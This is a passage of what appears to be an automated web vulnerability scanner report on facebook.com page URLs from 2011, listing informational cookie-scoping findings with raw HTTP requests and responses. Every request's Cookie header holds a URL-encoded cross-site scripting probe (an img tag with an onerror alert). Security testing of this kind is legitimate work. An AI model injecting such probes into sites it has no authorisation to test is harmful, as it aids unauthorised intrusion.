<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.60. http://www.facebook.com/pages/Bernicks-Pepsi/123296084349478  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Bernicks-Pepsi/123296084349478

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Bernicks-Pepsi/123296084349478 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.103.35
Connection: close
Date: Thu, 05 May 2011 11:41:46 GMT
Content-Length: 26965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.61. http://www.facebook.com/pages/Blaine-Senior-High/106189406087059  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Blaine-Senior-High/106189406087059

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Blaine-Senior-High/106189406087059 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.138.81
Connection: close
Date: Thu, 05 May 2011 11:42:01 GMT
Content-Length: 26986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.62. http://www.facebook.com/pages/Editor-in-Chief/137829579583400  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Editor-in-Chief/137829579583400

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Editor-in-Chief/137829579583400 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.75
Connection: close
Date: Thu, 05 May 2011 11:41:46 GMT
Content-Length: 26953

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.63. http://www.facebook.com/pages/Gilco-Corporation/109823499042436  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Gilco-Corporation/109823499042436

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Gilco-Corporation/109823499042436 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.156.75
Connection: close
Date: Thu, 05 May 2011 11:41:52 GMT
Content-Length: 26978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.64. http://www.facebook.com/pages/HMFIC/149403761740008  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/HMFIC/149403761740008

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/HMFIC/149403761740008 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.83
Connection: close
Date: Thu, 05 May 2011 11:41:49 GMT
Content-Length: 26855

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.65. http://www.facebook.com/pages/HuffPost-World/70242384902  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/HuffPost-World/70242384902

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/HuffPost-World/70242384902 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 301 Moved Permanently
Location: http://www.facebook.com/HuffPostWorld
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.199.43
Connection: close
Date: Thu, 05 May 2011 11:42:02 GMT
Content-Length: 0


10.66. http://www.facebook.com/pages/Manchester-Connecticut/112527912096312  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Manchester-Connecticut/112527912096312

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Manchester-Connecticut/112527912096312 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.149.35
Connection: close
Date: Thu, 05 May 2011 11:41:58 GMT
Content-Length: 41389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.67. http://www.facebook.com/pages/Merchandiser/123981654314779  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Merchandiser/123981654314779

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Merchandiser/123981654314779 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.41
Connection: close
Date: Thu, 05 May 2011 11:41:45 GMT
Content-Length: 26925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.68. http://www.facebook.com/pages/New-Haven-College/130105783687523  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/New-Haven-College/130105783687523

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/New-Haven-College/130105783687523 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.198.61
Connection: close
Date: Thu, 05 May 2011 11:42:00 GMT
Content-Length: 26979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.69. http://www.facebook.com/pages/Northern-Illinois-University/108155335871674  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Northern-Illinois-University/108155335871674

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Northern-Illinois-University/108155335871674 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.57
Connection: close
Date: Thu, 05 May 2011 11:41:46 GMT
Content-Length: 31693

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.70. http://www.facebook.com/pages/San-Antonio-Texas/110297742331680  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/San-Antonio-Texas/110297742331680

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/San-Antonio-Texas/110297742331680 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.153.69
Connection: close
Date: Thu, 05 May 2011 11:42:00 GMT
Content-Length: 39429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.71. http://www.facebook.com/pages/School-of-Hard-Knocks-University-of-Life/115228431825707  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/School-of-Hard-Knocks-University-of-Life/115228431825707

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/School-of-Hard-Knocks-University-of-Life/115228431825707 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.163.39
Connection: close
Date: Thu, 05 May 2011 11:41:50 GMT
Content-Length: 27236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.72. http://www.facebook.com/pages/Sporting-News/104068362964496  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/Sporting-News/104068362964496

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/Sporting-News/104068362964496 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.135.73
Connection: close
Date: Thu, 05 May 2011 11:41:46 GMT
Content-Length: 31370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.73. http://www.facebook.com/pages/ToP-SeCNeT/195242630519520  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/ToP-SeCNeT/195242630519520

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/ToP-SeCNeT/195242630519520 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.134.37
Connection: close
Date: Thu, 05 May 2011 11:42:02 GMT
Content-Length: 47298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.74. http://www.facebook.com/pages/University-of-Chicago-Semester-in-Madrid/144554762263161  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/University-of-Chicago-Semester-in-Madrid/144554762263161

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/University-of-Chicago-Semester-in-Madrid/144554762263161 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
